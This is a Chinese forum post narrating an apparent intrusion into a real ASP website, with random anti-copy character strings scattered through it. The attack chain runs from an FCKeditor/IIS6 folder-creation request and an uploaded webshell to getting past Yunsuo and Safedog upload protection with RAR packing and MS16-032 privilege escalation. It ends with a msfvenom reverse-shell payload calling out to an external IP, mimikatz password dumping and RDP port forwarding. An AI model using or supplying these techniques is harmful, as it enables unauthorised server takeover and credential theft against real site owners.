找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2236|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 k& g' L& K2 H! s3 L% X1 P/ B. a

7 [5 v" i/ \, j& m- [" G- T2 \" V9 ^4 s ]$ ~3 W% }( B' U% p0 b4 O; z+ ]8 g8 A. _, H5 x7 Y2 e/ \1 p( }7 A( q, j T7 v4 @4 B( o" d
, m1 U9 Y2 e$ _. \6 L x

$ x, \2 _7 |' z
" y: r6 g4 d" z' J- {2 _: G6 ^6 _
一、 利用getwebshell
9 x4 |8 V! x9 @9 |4 u* @
6 A9 v# z) r4 n; g. [, @
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
u6 E' }4 K* v! X( x2 v+ T
6 E3 P* `) U( H/ E D( y/ n. P' z222.png
- f% g' Z) L \ U' J2 g
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
# b" `! d1 M+ V, l 333.png
2 Q: I/ Q O. Z) O
下面我们构造一个asp目录,如: 1 v/ C' d* E9 g$ A J

! P+ d" J8 R, R$ M1 E7 j

( C }# ]9 R. |) ` http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 1 \. G: g. d# z$ s8 \) N( `

$ A1 K" v5 D2 G# C9 ^

' A; n( w8 S4 B" O 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
0 {* D- [. F5 O5 c7 K1 f- c
3 v7 N! k. f/ P# A0 d: f
一、 绕过安全狗云锁提权并且加账号
2 e$ T! o" \ S0 K444.png
D. d$ Y% U$ d
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
7 o; C5 F; u, q( K; J' a. L \
J' J4 k2 o: U: ]% R
如图:
, l! N3 C- E& P) w4 m 555.png
. ^4 V% B3 J$ K [; {
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
Z1 H C4 P9 b
9 }2 c3 y3 G7 O2 r
一、 利用metasploit
. E- m' T1 o# T2 b, u% B
! s/ e5 k8 l1 f% T2 [
首先用pentestbox生成一个64位的payload如下命令
4 l( a' f* g8 {0 Z& {6 W
0 n% M6 d( @: b8 S vmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
7 K3 D9 C8 J) K6 K* h+ Y
$ R6 l j. a$ G7 k3 p( u9 Q4 p% w) k1 h
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
% v7 S( Z$ k p) J# ?& v, ^ G11.png
8 P3 f9 |) ` h! j
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
9 q- d0 X, p- I# Z: K13.png
2 s4 y& a9 b. Z
下面我们来做一个监听如下命令:
! K, L9 R0 E% l y4 E. v2 b8 `& z
) U! s, N; P" [' Z portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
" R/ z( I. Q; |5 k18.png
U& ]. N: _6 ]# b2 q

# u8 c0 [, ]8 U, F. U) X
1 n& N& R0 ~) m/ X: L8 O7 c, _- @

* y4 u; d" Z, v4 F5 @

, }" F9 k- H* Q% M* C
4 [9 l) W! |+ c+ O8 O
/ \3 \2 n9 E7 B8 x$ |9 R: g
/ f. s) P0 W% W( I: H

0 k2 | V/ O: X0 r+ T1 M" K
5 p% H3 D# a: k; G % d! O: Q/ I: d5 \

* F0 L+ r# n* ]
. e. [8 m! q6 v( t8 x6 D

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表